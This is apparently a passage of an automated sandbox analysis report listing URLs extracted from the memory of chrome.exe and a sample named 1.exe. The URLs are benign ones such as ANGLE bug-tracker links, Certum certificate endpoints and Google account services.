Source: chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5375
Source: chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5421
Source: chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5430
Source: chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5535
Source: chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5535Q
Source: chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5658
Source: chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1887626629.000060E800470000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5750
Source: chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5881
Source: chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5901
Source: chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5906
Source: chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6041
Source: chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6048
Source: chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6141
Source: chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6248
Source: chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6439
Source: chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6651
Source: chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6692
Source: chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6755
Source: chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6755V
Source: chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6860
Source: chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6876
Source: chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6878
Source: chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6929
Source: chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6953
Source: chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1882852452.000060E80001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7036
Source: chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7047
Source: chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7172
Source: chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1887626629.000060E800470000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7279
Source: chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7370
Source: chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7370:
Source: chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7406
Source: chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7488
Source: chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7553
Source: chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7556
Source: chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1889703732.000060E80080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7724
Source: chrome.exe, 00000002.00000002.1889703732.000060E80080C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7724ty
Source: chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1887626629.000060E800470000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7760
Source: chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7761
Source: chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8162
Source: chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8215
Source: chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8229
Source: chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8229E
Source: chrome.exe, 00000002.00000003.1798051807.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800889394.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1887626629.000060E800470000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8280
Source: 1.exe	String found in binary or memory: http://ccsca2021.crl.certum.pl/ccsca2021.crl0s
Source: 1.exe	String found in binary or memory: http://ccsca2021.ocsp-certum.com05
Source: chrome.exe, 00000002.00000002.1886345380.000060E800280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://clients2.google.com/time/1/current
Source: chrome.exe, 00000002.00000002.1888320938.000060E80060C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
Source: 1.exe	String found in binary or memory: http://crl.certum.pl/ctnca.crl0k
Source: 1.exe	String found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
Source: chrome.exe, 00000002.00000002.1870115418.000002993E98E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.v
Source: chrome.exe, 00000002.00000002.1883162800.000060E80005A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://google.com/
Source: chrome.exe, 00000002.00000003.1800859342.000060E800370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1892265441.000060E800C14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://issuetracker.google.com/200067929
Source: chrome.exe, 00000002.00000003.1805040618.000060E801018000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1805106096.000060E801028000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1805172416.000060E800F08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1805213453.000060E801044000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://jsbin.com/temexa/4.
Source: chrome.exe, 00000002.00000003.1806458739.000060E800F64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1805040618.000060E801018000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1805142658.000060E801078000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1806881310.000060E801100000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1806376008.000060E800A24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1806415638.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1886716175.000060E8002E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1805106096.000060E801028000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1806335993.000060E800C88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1805172416.000060E800F08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1805213453.000060E801044000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1806696090.000060E80041C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1806881310.000060E801158000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/AUTHORS.txt
Source: chrome.exe, 00000002.00000003.1806458739.000060E800F64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1805040618.000060E801018000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1805142658.000060E801078000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1806881310.000060E801100000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1806376008.000060E800A24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1806415638.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1886716175.000060E8002E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1805106096.000060E801028000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1806335993.000060E800C88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1805172416.000060E800F08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1805213453.000060E801044000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1806696090.000060E80041C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1806881310.000060E801158000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
Source: chrome.exe, 00000002.00000003.1806458739.000060E800F64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1805040618.000060E801018000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1805142658.000060E801078000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1806881310.000060E801100000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1806376008.000060E800A24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1806415638.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1886716175.000060E8002E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1805106096.000060E801028000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1806335993.000060E800C88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1805172416.000060E800F08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1805213453.000060E801044000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1806696090.000060E80041C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1806881310.000060E801158000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/LICENSE.txt
Source: chrome.exe, 00000002.00000003.1806458739.000060E800F64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1805040618.000060E801018000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1805142658.000060E801078000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1806881310.000060E801100000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1806376008.000060E800A24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1806415638.000060E800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1886716175.000060E8002E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1805106096.000060E801028000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1806335993.000060E800C88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1805172416.000060E800F08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1805213453.000060E801044000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1806696090.000060E80041C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1806881310.000060E801158000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/PATENTS.txt
Source: chrome.exe, 00000002.00000002.1894152333.000060E800DD4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUw
Source: 1.exe	String found in binary or memory: http://repository.certum.pl/ccsca2021.cer0
Source: 1.exe	String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: 1.exe	String found in binary or memory: http://repository.certum.pl/ctnca2.cer09
Source: chrome.exe, 00000002.00000002.1889924354.000060E800880000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certs
Source: 1.exe	String found in binary or memory: http://subca.crl.certum.pl/ctsca2021.crl0
Source: 1.exe	String found in binary or memory: http://subca.ocsp-certum.com0
Source: 1.exe	String found in binary or memory: http://subca.ocsp-certum.com01
Source: 1.exe	String found in binary or memory: http://subca.ocsp-certum.com02
Source: 1.exe	String found in binary or memory: http://subca.repository.certum.pl/ctsca2021.cer0(
Source: chrome.exe, 00000002.00000002.1890680187.000060E8009CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://unisolated.invalid/
Source: chrome.exe, 00000002.00000002.1890680187.000060E8009CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://unisolated.invalid/a
Source: chromecache_80.4.dr	String found in binary or memory: http://www.broofa.com
Source: 1.exe	String found in binary or memory: http://www.certum.pl/CPS0
Source: chrome.exe, 00000002.00000002.1890968661.000060E800A30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.gstatic.com/generate_204
Source: chrome.exe, 00000002.00000002.1892049335.000060E800BC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chrome.exe, 00000002.00000002.1882852452.000060E80001C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accountcapabilities-pa.googleapis.com/
Source: chrome.exe, 00000002.00000002.1883280993.000060E80006C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
Source: chrome.exe, 00000002.00000002.1892422967.000060E800C50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1887268631.000060E8003B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com
Source: chrome.exe, 00000002.00000002.1892422967.000060E800C50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1882852452.000060E80001C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/
Source: chrome.exe, 00000002.00000002.1886148516.000060E8001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/AddSession
Source: chrome.exe, 00000002.00000002.1886345380.000060E800280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
Source: chrome.exe, 00000002.00000002.1886345380.000060E800280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
Source: chrome.exe, 00000002.00000002.1886148516.000060E8001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/Logout
Source: chrome.exe, 00000002.00000002.1886148516.000060E8001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/Logout1
Source: chrome.exe, 00000002.00000002.1886148516.000060E8001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/MergeSession
Source: chrome.exe, 00000002.00000002.1885908945.000060E800194000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/OAuthLogin
Source: chrome.exe, 00000002.00000002.1886345380.000060E800280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/RotateBoundCookies
Source: chrome.exe, 00000002.00000003.1813919525.000060E800294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport
Source: chrome.exe, 00000002.00000003.1813919525.000060E800294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/allowlist
Source: chrome.exe, 00000002.00000003.1813919525.000060E800294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/fine-allowlist
Source: chrome.exe, 00000002.00000002.1886345380.000060E800280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/chrome/blank.html
Source: chrome.exe, 00000002.00000002.1886345380.000060E800280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/chrome/blank.htmlB
Source: chrome.exe, 00000002.00000002.1886345380.000060E800280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
Source: chrome.exe, 00000002.00000002.1884913498.000060E800090000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
Source: chrome.exe, 00000002.00000002.1884913498.000060E800090000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
